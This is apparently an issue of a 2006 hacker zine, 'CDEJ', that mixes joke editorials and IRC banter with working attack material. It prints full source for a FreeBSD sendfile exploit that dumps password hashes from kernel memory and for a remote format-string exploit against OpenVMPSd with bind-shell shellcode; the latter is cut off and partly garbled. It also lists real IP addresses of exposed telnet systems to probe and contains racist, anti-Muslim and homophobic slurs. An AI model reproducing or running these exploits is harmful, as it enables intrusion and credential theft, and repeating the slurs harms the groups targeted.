*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x *x L'ELEPHANT AVEC LES TRUNKS HUGE *x *x izzue six *x *x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x *x *x *x *x *x ___ __ *x *x / \____ / \ *x *x / / __ \ \ *x *x / | Oo | \ *x *x \___/| |\___/\ *x *x | |_| |_| \ *x *x | |/|__|\| \ *x *x | |__| |\ *x *x | |__| |_/ / \ *x *x | @ | | @ || @ | ' *x *x | |~~| || | *x *x 'ooo' 'ooo''ooo' *x *x *x *x "CDEJ - I love this game" *x *x *x *x *x *x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej. *x*x*x*x*x*x*x*x*x*x*x*x*[ issue #6 14/02]*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x [x]=[000] intro: cdej state of the union address - staff [x] :D? :D? [x]=[001] #cdej@efnet quotes / fanmail - staff [x] :D? :D? [x]=[002] m00.c [this issue's premier 0day] - m00 [x] :D? :D? [x]=[003] a feedline energy analysis - c3c1l 4 m00r3 [x] :D? :D? [x]=[004] strange things found on the internet - fathaqr [x] :D? :D? [x]=[005] what's hot, what's not, a guide to 2006 haqr fashion - longarms [x] :D? :D? [x]=[006] OpenVMPSd Remote Format String Exploit - gotfault security [x] :D? :D? [x]=[007] Sony/Ericsson Bluetooth (Reset Display) DoS - some french fag [x] :D? :D? [x]=[010] eXchange POP3 5.0(rcpt to) Remote BOF - secura massine [x] :D? :D? [x]=[011] guide to making source code virus' using MS - two-twenty [x] *x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej. /efnet/#cdej/efnet/#cdej/efnet/#cdej/efnet/#cdej/efnet/#cdej/efnet/#cdej/efne ASCII ART CARTOON THAT WILL MAKE PEOPLE RIOT! PASS IT ON!! =============================================================== @ O o -_- <(Hello I'm a m*slim! I blow things up! Free Kevin!) o0o0o0o0 phag-> 8D <(Sir as an advocate of peace I suggest that we learn to live in close proximity to one another while respecting each others beliefs.) o0o0o0o0 O /\ /\ /\ @ o < k4b3wM!> D -_- \/ \/ \/ 8 o0o0o0o0 @ O o -_- <(Hi I am dead now, can I have my virgins please?) o0o0o0o0 @@@@@@@@@ @@@@@@@@@@@ [b1gturb4n] \ oO / <(I'm the king of dead 4r4bz. Here's \ ---- / the virgin goats we promised!) \ / o0o0o0o0 @ O o -_- <(Yay!) oO <(Baaaaa give me cans to eat!) -- >--- / \ o0o0o0o0 Fin. =============================================================== 000x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro . . . . . . . . . . . . . . . . . . . . . . . . . . . . cdej staff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 000x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*000 A Letter to Our Troops: With time, it is inevitable that any noble literary persuit will reach a certain level of maturity, if it is to survive amongst equally innovative competition. Gutenberg's invention of the printing press, the Ancient Egyptian discovery of mumification, all long-lasting enterprise are formulated with one goal in mind: survival and improvement of the human race. While economic goals can be cited as short term motivations for labor and research, one must learn to look at economy as a providence of necessity, and not the motivating factor itself. CDEJ has, since last issue, met and surpassed new milestones. We have had our one billionth visit to our website. We've finally been offered a partnership with government cybersecurity agencies. We've been given the opportunity to beta-test Solaris12, Windows 2010RE (Robot Edition), and the 2015 version of the Aibo. In short, we've conquerored and continue to excell. Our rivals are lost somewhere in the massive mushroom cloud of our proverbial 'dust'. The Phrack site has been taken down out of sheer despiration; they simply couldn't match us. 2600 editor Emmanuel Goldstein (having recently been released from prison on bond for child molestation charges) has continued to send us large amounts of currency in an effort to keep our movement underground. It won't work. CDEJ has risen in the last 6 months as *the* driving force behind the computer underground, and we will continue to achieve, with our readers' support. Send me your 0day, your articles. Chill in #cdej/efnet. Learn and hang out with us, and together we'll grow more elite than our DARPA investors ever imagined possible. - cdej staff 5 star general council elite beyond imagination 001x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*001 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Misc. Nonsense . . . . . . . . . . . . . . . . . . . . . . . . . . cdej staff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 001x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*001 paste me what you have written so far :/ dude i write with a paper and pen [ TIME PASSES ] krypton send me your article dood i lost my sence of humor in middle of my writing i can finish it then give it to me and i'll finish it and post it under your name :D? cant* dude i wrote it on a paper ======================= :D? :D? :D? :D? :D? :D? ======================= i remember back then when i used to bring hookers to IRC ======================= :D? :D? :D? :D? :D? :D? ======================= http://discharges.org/h/0601/ ======================= :D? :D? :D? :D? :D? :D? ======================= An interesting exerpt from: http://www.coolnerds.com/Newbies/Fear/hackFear/hackfear.htm The above site is highly recommended reading.... In the movies, brilliant good-looking kids [thanks :.)] are able to break into other peoples' computers just by typing some nonsense [to some people, j00nix isn't nonsense! once I meet one, I'll proove it!] at a keyboard and luckily guessing a password [actually we just use hydra]. In real life, that's impossible [:D?]. Even if you leave your computer on and connected to the Internet 24 hours a day, 7 days a week [now who in the world would do that? my uptime never goes beyond 30 minutes!], nobody can log into your computer and rummage around through your files [i guess i need to find a new hobby :.(]. Nobody can steal stuff off your hard disk. Such things never happen, because they can't happen, despite what the media tells you. [Are you refering to 'Hackers' the movie?] [The lunacy continues at http://www.coolnerds.com/Newbies/Fear/hackFear/hackfear.htm ... ] ======================= :D? :D? :D? :D? :D? :D? ======================= [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from ch hannel [#phrack] Banned from channel [#phrack] Banned FANMAIL ack] Banned from channel [#phrack] Banned from ch ned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned from channel [#phrack] Banned fro Dear CDEJ: I'm a single parent trying to survive in today's high tech world of 0day, exploits, DoS botnets, and federal raids. I am interested in protecting my kids (two of whom are old enough to IRC, and one of whom is starting to learn) from haqrs like CHANFIX. Any suggestions? - Betty Dear Betty: Raising a kid on today's IRC networks can be tough. I suggest you equip them for the 'real world' as early as you can, by teaching them how to use important tools like 7th Sphere and winnuke. The earlier they learn about IRC threats and how they can protect themselves, the better they will be in the long term. - Dr. Longarms ======================= :D? :D? :D? :D? :D? :D? ======================= Dear CDEJ: I am curious, what is the history of CDEJ? - History Channel Dear History Channel: CDEJ zine started when cdej leader longarms invited w01f and trans to create a next-generation haqr zine. w01f and trans knew each other from the roles they played on the MGM film 'Hackers'. You may be amazed to learn that 'razor' and 'blade' were actually trans and w01f! The unique make-up and homofaggot look (created to increase the 'hacker' feel of the movie') was invented by b4b0 members. Special thanks to them! Interesting enough, haqr trans and haqr w0lf had also worked on advanced projects at Bellcore (now telcordia) back in the 1970s! NO MORE FAN MAIL THIS ISSUE, SEND STUFF IN HAQRS 002x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*002 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m00.c . . . . . . . . . . . . . . . . . . . . . . . . . . . phearfull 0day . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 002x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*002 #include #include #include #include #include #include #include #define MAX_PAS_LEN 128 /* max line length in master.passwd */ #define DUMPSIZE 64 /* mb */ #define MD5_HASH_LEN 34 /* md5 hash lenght */ #define CH 0x41 /**************************************************** !!! m00 private code !!! m00-sendfile - FreeBSD master.passwd dump Will make exact copy of master.passwd Tested under FreeBSD 5.2 Should work under FreeBSD <=5.3 && FreeBSD <=4.11 (c)oded by blf 2005 Thanks to kcope for idea Gr33tz: h0snp, rash, ov3r, akula, izik, ares, 1dt.w0lf, BlackPrince, wh, rsh, Inck-Vizitor, camel, whice, rebel, Phoenix http://www.blackhat.ru All rights reserved !!! m00 private code !!! ****************************************************/ u_int counter = 0; short mode; void usage(char *argv) { fprintf(stderr, "Usage: %s 0|1\n\t0 - make full kvm dump\n\t1 - make master.passwd only dump\n", argv); fprintf(stderr, "m00sendfile by blf (c) 2005 m00\n"); exit(-1); } void get_users() { FILE * fd; char line[MAX_PAS_LEN]; if ((fd = fopen("/etc/passwd", "r")) == NULL) // here we get number of users { fprintf(stderr, "[!] Cannot open /etc/passwd file!\n"); exit(-1); } while (fgets(line, MAX_PAS_LEN, fd)) { if(*(line+0) == '#') continue; counter++; } printf("[~] %d users found in master.passwd\n", counter); fclose(fd); } void get_dump(struct sockaddr_in addr) { int sock, client_sock; char line[MAX_PAS_LEN]; char * start = "root:$1$"; int i, j = 0, ok = 0, found = 0; FILE * f, * dump; if(mode) f = fopen("master.passwd", "w"); else dump = fopen("dump", "w"); sock = socket(PF_INET, SOCK_STREAM, 0); if (bind(sock, (struct sockaddr*) &addr, sizeof(addr)) < 0 ) { fprintf(stderr, "[!] bind() failed!\n"); exit(1); } listen(sock, 1); client_sock = accept(sock, 0, 0); while(read(client_sock, line, sizeof(line))) { if(found && mode) { if(found == counter) break; /* master.passwd dumped */ fputs(line, f); found++; continue; } for(i = 0; i < sizeof(line); i++) { if(!mode && !ok) { /* in th beginning we have some shit in the file */ if((*(line+i) != CH) && (j/1024/1024) > 1) { printf("[~] kvm found in dump, after reading %d mb\n", j/1024/1024); ok = 1; } } if(*(line+i) == 'r' && mode) { if(strncmp((line+i), start, strlen(start)) == NULL) { if(*(line+i+MD5_HASH_LEN+5) == ':') { printf("[~] root found in dump!\n"); fputs(line+i, f); found = 1; break; } } } j++; } if(!mode && ok) fwrite(line, sizeof(line), 1, dump); } if(mode) { if(!found) printf("[!] master.passwd was not found in dump! Try to run exploit again\n"); else printf("[~] master.passwd was successfuly dumped!\n"); printf("[~] %d user passwords were discovered\n", found); fclose(f); exit(0); } else { if(ok) { printf("[~] %d mb read from dump\n", j/1024/1024); printf("[!] kvm was successfuly dumped!\n"); } else printf("[!] kvm was not found in dump. Probably box is patched...\n"); fclose(dump); } } int main(int argc, char ** argv) { int file, mysock, j, i =0; FILE * f; struct sockaddr_in addr; pid_t pid, suid; if(argc < 2) usage(argv[0]); if(strncmp(argv[1], "1", 1) == NULL) { mode = 1; printf("[~] Making master.passwd dump only\n"); } else { mode = 0; printf("[~] Making full kvm dump\n"); } mysock = socket(PF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(9999); addr.sin_family = PF_INET; if(mode) get_users(); f=fopen("/tmp/.shit", "w"); for (i=0; i <= DUMPSIZE * 1024 * 1024; i++) { fputc(CH, f); } fclose(f); file = open("/tmp/.shit", O_RDWR); pid = fork(); if (pid > 0) { sleep(2); /* here we sleep, before connect */ if (connect(mysock, (struct sockaddr*) &addr, sizeof(addr)) == -1) { perror("connect() failed"); return 2; } suid = fork(); if (suid > 0) { if (sendfile (file, mysock, 0, DUMPSIZE * 1024 * 1024, NULL, NULL, 0) == -1) { fprintf(stderr, "[!] sendfile() failed!\n"); exit(-1); } } if(suid == 0) { f=fopen("/tmp/.shit", "w"); fclose(f); /* erase file, to make kernel send it's memory */ for (j = 0; j < 10; j++) system("/usr/bin/chsh -s /bin/sh"); /* call suid, to put master.passwd into kvm */ } } if(pid == 0) { get_dump(addr); } close(file); shutdown(mysock, 2); return 0; } // EOF! 003x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*003 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a feedline energy analysis (reproduced without perms! . . . . . . . . . . . . . . . . c3c1l 4 m00r3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 003x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*003 Where Does the Power Go? [1] There continue to be many differing responses to the question within the amateur radio community and, so far, no one has presented the facts of the physics of power as understood from the field of optics. Those facts from optics have been known and understood for decades and are consistent with the laws of physics and the equations governing the behavior of RF transmission lines. Light and RF waves are both composed of electromagnetic energy. Most of the following information comes from "Optics" [2]. In the field of optics, irradiance is the same thing as power in an RF transmission line if the cross sectional area of the transmission line is taken into account. Irradiance has the dimensions of energy per unit area per unit time. If the light beam of a particular laser occupies the same cross sectional area as a particular coaxial RF transmission line then the irradiance of the laser beam is comparable to the RF power in the transmission line. The 1/4 wavelength thin-film deposited on glass to obtain a non-reflective surface performs in a virtually identical way to a 1/4 wavelength series matching section in a transmission line. Single-source RF energy in a transmission line and laser light are both coherent electromagnetic energy waves that obey the laws of superposition, interference, conservation of energy, and conservation of momentum. My Historical Perspective My first memories of the answer to "Where does the power go?" are articles published in QST written by Walter Maxwell, W2DU, some quarter of a century ago. Mr. Maxwell later compiled the information into a book titled, "Reflections", which quickly became the bible for Amateur Radio applications involving stub matching, transmission lines, and forward and reflected energy flow. Mr. Maxwell coined the terms, "virtual short" and "virtual open", as a shorthand description of what rearward-traveling reflected energy encounters at a match point in a transmission line resulting in 100% re-reflection. He also explained the function of destructive wave interference and constructive wave interference in achieving a match point on a transmission line [8] which is what a large part of this article is about. Sometime after the publication of Reflections, some people questioned the validity of Mr. Maxwell's concepts. In particular, Dr. Steven Best, VE9SRB, took Mr. Maxwell to task in a series of articles published in QEX [3]. Simply put, Dr. Best disagreed with Mr. Maxwell that reflected power is 100% re-reflected in a matched system. Before publication of his Part 3 QEX article, Dr. Best sent up trial balloons for his ideas on the usenet newsgroup, rec.radio.amateur.antenna. My opinion was that Dr. Best's future article contained numerous errors which were pointed out to him. However, the article as published still contained the alleged errors. My determination to resolve the conflicts between the concepts presented by Walter Maxwell and the ones presented by Dr. Best culminated in this present article. The conclusions will be presented first with the technical details to follow in Part II and Part III. In a nutshell, Walter Maxwell's "virtual short" is a two step process. The reflected wave from the load encounters the impedance discontinuity at the match point. A re-reflection occurs that equals the incident reflected power multiplied by the power reflection coefficient at the match point (the square of the voltage reflection coefficient). This re-reflected energy joins the forward wave traveling toward the load. That first energy re-reflection is not the only energy that joins the forward wave. That fact is what Dr. Best missed in his article. Interference of any kind was never mentioned in Dr. Best's QEX article. The part of the reflected wave that is not re-reflected is transmitted back through the impedance discontinuity at the match point and attempts to flow toward the source. We know the reflected energy doesn't make it to the source in a matched system, so where does it go? The answer is mentioned in "Reflections II" [8]. What Mr. Maxwell is describing is wave cancellation due to total destructive interference between two reflected waves. The first wave is the part of the source forward wave that is initially reflected back toward the source from the match point. The second wave is the part of the reflected wave from the load that is transmitted through the match point toward the source. These waves are equal in magnitude and opposite in phase so, as Mr. Maxwell asserts in Reflections II, they cancel to zero at the match point thus eliminating reflections between the match point and the source.. The canceling of these two waves to zero is the second step in Mr. Maxwell's virtual short process of 100% reflection. Voltages can cancel and currents can cancel but energy cannot cancel. What happens to the energy that existed in the waves before they were cancelled? Since we know that all the energy in a matched system winds up flowing toward the load, the answer is a no-brainer. There are only two directions in a transmission line. If energy that was previously flowing toward the source isn't flowing toward the source anymore, it must necessarily be flowing toward the load. The conclusion is inescapable. Not only is 100% of the reflected energy re-reflected at the match point, but wave cancellation is the cause of part of that re-reflection. This is a well understood phenomenon in the field of optics [9] but not well understood in the field of RF engineering. An RF engineer will usually say there are three things that can cause 100% reflection. Those are a short-circuit, an open-circuit, or a purely reactive impedance. This is true at a load. But at an impedance discontinuity with waves incident from both directions, to that list of three, we can add a fourth, namely wave cancellation due to total destructive interference. In general: The destructive interference energy resulting from wave cancellation at an impedance discontinuity becomes an equal magnitude of constructive interference in the opposite direction. Since there are only two directions in a transmission line, wave cancellation is the equivalent of an energy reflection. 100% wave cancellation means 100% energy reflection. [9] References are included in this Part I of the series and will not be repeated in Parts II and III. In Part II, the general case qualitative analysis will be presented. I would like to thank Mr. Robert E. Lay, W9DMK, for his substantial contributions to this article. References [1] Bloom, Jon, Where Does the Power Go?, "QEX", Dec. 1994 [2] Hecht, Eugene, "Optics", Fourth Edition, (c)Aug. 2001, Addison-Wesley, ISBN 0805385665 [3] Best, Steven R., Wave Mechanics of Transmission Lines, Part 3, "QEX", Nov/Dec 2001 [4] "Interference term", "Optics", Eugene Hecht, Fourth Edition Section 7.1 The Addition of Waves of the Same Frequency It follows ... that the resultant flux density is not simply the sum of the component flux densities; there is an additional contribution 2*E01*E02*cos(a2-a1), known as the interference term. ("a" replaces the Greek letter Alpha and INTERFERENCE TERM is emphasized.) Section 9.1 General Considerations The 'interference term' becomes I12 = 2*SQRT[(I1)(I2)]*cos(s) [where I is irradiance (power)] ('SQRT' replaces the square root sign and "s" replaces the Greek letter Sigma.) [5] "S-Parameter Techniques", Hewlett Packard Application Note 95-1, available on the web. The S-Parameter normalized voltage equations are: b1 = (s11)(a1) + (s12)(a2) and b2 = (s21)(a1) + (s22)(a2) The squares of all those terms are related to power as explained in the application note. It is left as an exercise for the reader to square both sides of both equations above and observe that the resulting equations contain the interference term that agrees with Eq 1 and Eq 2 in the body of this paper. [6] "Optics", Eugene Hecht, Fourth Edition Section 3.3 Energy and Momentum, "One of the most significant properties of the electromagnetic wave is that it transports energy and momentum." [Note from W5DXP: Energy and momentum must be conserved. The direction of the energy and momentum associated with reflected waves must be reversed for a match to occur.] Section 4.11 Photons, Waves and Probability, "The principle of conservation of energy makes it clear that if there is constructive interference at one point, the 'extra' energy at that location must have come from somewhere else. There must therefore be destructive interference somewhere else. "If two or more electromagnetic waves arrive at point P out-of-phase and cancel, 'What does that mean as far as their energy is concerned?' Energy can be distributed, but it doesn't cancel out." Section 7.1 The Addition of Waves of the Same Frequency, "The superposition of coherent waves generally has the effect of altering the spatial distribution of the energy but not the total amount (of energy) present." [7] "Optics", Eugene Hecht, Fourth Edition Section 9.1 General Considerations, "A maximum irradiance (power) is obtained when cos(s) = 1. ... In this case of total constructive interference, the phase difference between the two waves is an integer multiple of 2*Pi, and the disturbances are in-phase. ... A minimum irradiance (power) results when the waves are 180 degrees out-of-phase, ... cos(s) = -1, ... and is referred to as total destructive interference." ("s" replaces the Greek letter Sigma and TOTAL DESTRUCTIVE INTERFERENCE is emphasized.) [8] Maxwell, Walter, "Reflections II", (c) 2001 Worldradio Books, ISBN 0-9705206-0-3 page 4-3, "The destructive wave interference between these two complementary waves ... causes a complete cancellation of energy flow in the direction toward the generator. Conversely, the constructive wave interference produces an energy maximum in the direction toward the load, ..." page 23-9, "Consequently, all corresponding voltage and current phasors are 180 degrees out of phase at the matching point. ... With equal magnitudes and opposite phase at the same point (point A, the matching point), the sum of the two (reflected) waves is zero." [9] Quotes from two web pages from the field of optical engineering: www.mellesgriot.com/products/optics/oc_2_1.htm "Clearly, if the wavelength of the incident light and the thickness of the film are such that a phase difference exists between reflections of p, then reflected wavefronts interfere destructively, and overall reflected intensity is a minimum. If the two reflections are of equal amplitude, then this amplitude (and hence intensity) minimum will be zero." (Referring to 1/4 wavelength thin films.) "In the absence of absorption or scatter, the principle of conservation of energy indicates all 'lost' reflected intensity will appear as enhanced intensity in the transmitted beam. The sum of the reflected and transmitted beam intensities is always equal to the incident intensity. This important fact has been confirmed experimentally." http://micro.magnet.fsu.edu/primer/java/scienceopticsu/interference/waveinteract ions/index.html "... when two waves of equal amplitude and wavelength that are 180-degrees ... out of phase with each other meet, they are not actually annihilated, ... All of the photon energy present in these waves must somehow be recovered or redistributed in a new direction, according to the law of energy conservation ... Instead, upon meeting, the photons are redistributed to regions that permit constructive interference, so the effect should be considered as a redistribution of light waves and photon energy rather than the spontaneous construction or destruction of light." Note from W5DXP: In an RF transmission line, since there are only two possible directions, the only "regions that permit constructive interference" at an impedance discontinuity is the opposite direction from the direction of destructive interference. 004x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*004 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . strange things found on the net . . . . . . . . . . . . . . . . . . . . . fathaqr . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 004x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*004 There are strange things on the net, we haven't explored it all yet! Ideas include scanning for open shares with netbios (NBT, TCP port 139), telnet scanning, ssh scanning, and 443 (ssl web) scanning! Here are some telnet's for y'all. Don't do anything bad, or you ruin it for others. You can probably legally telnet and look, but then disconnect! No hacking allowed!! When you're done, go do your own scans and give them to the 31337 people at cdej! Telnet: 70.245.153.150 -- tivo 64.231.141.189 -- tivo 128.82.176.72 -- openvms with cool banner 68.214.24.35 -- funny banner 201.216.201.130 -- linux voicemail system 218.15.101.122 -- videophone configuration 218.103.149.40 -- videophone configuration 72.248.50.62 -- car wash 62.73.186.59 -- MUD 130.232.72.71 -- MUD 212.85.198.9 -- Africa Online (lol) 18.162.0.14 -- tcp/ip and x.25 gateway 195.113.179.124 -- radio link terminal 200.55.130.219 -- radio link terminal 200.55.217.84 -- VoIP gateway system 200.55.130.219 -- multivoip Web: telephreak.org -- free VMB and conf mininova.org -- good torrents http://sat.berlios.de/devel/sat.srules -- good text to identify systems Use this code to find whatever music you want from google: javascript:void(qr=prompt('Slapman%20-%20Music%20Search%20Indexer%20-%20Type%20any%20Music%20or%20Album%20Name:%20',''));if(qr)location.href='http://www3.google.com/search?&num=100&hl=en&ie=UTF-8&oe=UTF-8&btnG=Google+Search&as_epq=parent+directory=&as_oq=mp3+wma+ogg+anonymous&as_eq=module+modules&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images&as_q='+escape(qr);void%201; Use this code to find movies: javascript:void(qr=prompt('Movie%20Search%20Indexer%20-%20Type%20any%20Movie%20Name:%20',''));if(qr)location.href='http://www3.google.com/search?&num=100&hl=en&ie=UTF-8&oe=UTF-8&btnG=Google+Search&as_epq=parent+directory=&as_oq=wmv+mpg+mpeg+avi+rm+anonymous&as_eq=module+modules+mp3+porn+sex+xxx+incest+rape&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images&as_q='+escape(qr);void%201; Keep the spirit alive! FatHaqr, CDEJ special agent 005x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*005 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . what's hot, what's not: 2006 haqr fashion . . . . . . . . . . . . . . . . . . . cdej staff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 005x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*005 Stop living in the 90s. This will get you nowhere. Use this handy chart to decide which of your personal habits need to change if you are ever going to become a cdej-worthy haqr. HOT (2006) NOT (1996) -------------------------------------------- cdej Lo? (? = D, U, etc.) uncombed, long hair dyed hair, cut short clothes that you never change tight clothes, latex d&b, ambient house, trance trans, w01f, longarms eric corley, phiber optik around the world around NYC republican democrat guns being scared of guns silent hill super mario bros opensolaris, linux 2.6 openbsd (theo is a commie) software programmable radio BOF, DoS decrypting GSM getting yer ham license GSM AMPS aibo tamagachi sbc handsets and helmets bellsouth handsets and helments war peace reading watching movies sitting at home defcon running, working out drugs mr. t (mr t. has *always* been pure cdej) cdej.org slashdot.org ASCII ANSI / RIP stock market selling drugs There you have it. If you remember and follow these fashion tips, chances are you will at least look and act like a haqr, even if you have no idea how to use a computer. k.thx! 006x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*006 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . OpenVMPSd 0day . . . . . . . . . . . . . . . . . . . . . . . . . Gotfault Sec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 006x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*006 /*OpenVMPSd <= 1.3 Remote Format String Exploit (Multiple Targets) 890 -Gotfault Security*/ /* * gexp-openvmpsd.c * * OpenVMPSd v1.3 Remote Format String Exploit * Copyright (C) 2005 Gotfault Security * * Bug found and developed by: barros and xgc * * Original Reference: * http://gotfault.net/research/exploit/gexp-openvmpsd.c * */ #include #include #include #include #include #include #include #include #include #include #include /*==[ Prototypes ]==*/ void Usage(char *); void fatal(char *); int CreateEvilBuffer(int, int, int, int, char *); void ExecuteShell(int); void SendBuffer(int , char *, int); int CreateUdpSocket(void); int ConectToHost(char *, int); /*==[ Defines ]==*/ #define DEFAULT_PORT 1589 // Default server port #define BIND_PORT 31337 // Default port to bind #define NOPSIZE 50 // Do not change this value cause the shellcode space is "limited" #define NOP 0x90 // Nop value #define PAD "..." // Format string alignment #define PORT_OFFSET 29 // Offset to fix the shellcode /*==[ Targets ]==*/ struct { char *Name; int Gotaddr; int Retaddr; int Pop; }Targets[] = { "OpenVMPSd v1.3 @ Slackware 10.0", 0x0804e57c, 0xbffff4f5, 19, "OpenVMPSd v1.3 @ Debian 3.0 Linux", 0x0804d0f8, 0xbffff7ac, 29, "OpenVMPSd v1.3 @ Fedora Core 2", 0x0804d0f8, 0xbffff7ac, 19, // Finish 0, 0, 0, 0 }; /*==[ Shellcode by Marco Ivaldi ]==*/ char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" "\x89\xc7\x52\x66\x68" "BP" // Port to bind "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" "\xb0\x66\xb3\x04\xcd\x80" "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; /*==[ OpenVMPSd UDP packet header ]==*/ #define SIZE_OF_HEADER 14 char header[] = "\x41\x01\x41\x01\x41\x41\x41\x41\x00\x00\x0c\x02"; int main(int argc, char **argv) { extern char *optarg; extern int optind; char opt; char *Host = NULL; int Port = DEFAULT_PORT; int BindPort = BIND_PORT; int TargetNumber = 0; int Sock,i; char *EvilBuffer; int BufLen; fprintf(stdout,"\n--=[ OpenVMPSd Remote Format String Exploit ]\n\n"); // Process arguments while ( (opt = getopt(argc,argv,"h:t:p:r:")) != EOF) { switch(opt) { case 'r': BindPort = atoi(optarg); if(!BindPort) Usage(argv[0]); break; case 'p': Port = atoi(optarg); if(!Port) Usage(argv[0]); break; case 't': TargetNumber = atoi(optarg); break; case 'h': Host = optarg; break; default: Usage(argv[0]); break; } } if(Host == NULL) Usage(argv[0]); // Verify target for(i=0;;i++) if(Targets[i].Name == 0) break; if(--ih_addr,hp->h_length); server.sin_port = htons(Port); s = socket(PF_INET,SOCK_DGRAM,0); if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) return(-1); return(s); } int ConectToShell(char *Host,int Port) { struct sockaddr_in server; struct hostent *hp; int s; server.sin_family = AF_INET; hp = gethostbyname(Host); if(!hp) return(-1); memcpy(&server.sin_addr,hp->h_addr,hp->h_length); server.sin_port = htons(Port); s = socket(PF_INET,SOCK_STREAM,0); if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) return(-1); return(s); } int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer) { char *nops = malloc(NOPSIZE+1); char *ptr; unsigned short *len; unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET); // Fix shellcode *portPtr = htons(BINDTOPORT); // Header ptr = buffer; memcpy(ptr,header,12); ptr += SIZE_OF_HEADER; len = (unsigned short *)(buffer + SIZE_OF_HEADER - 2); // Create Nops bzero(nops,NOPSIZE+1); memset(nops,NOP,NOPSIZE); // Create format string attack sprintf(ptr, PAD "%c%c%c%c" "%c%c%c%c" "%%.%dd" "%%%d$hn" "%%.%dd" "%%%d$hn" "%s%s", ((u_long)GOT), ((u_long)GOT >> 8), ((u_long)GOT >> 16), ((u_long)GOT >> 24), ((u_long)GOT+2), (((u_long)GOT+2) >> 8), (((u_long)GOT+2) >> 16), (((u_long)GOT+2) >> 24), ((RETADDR & 0x0000FFFF) - 9 - 63), POP, (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)) - 1, 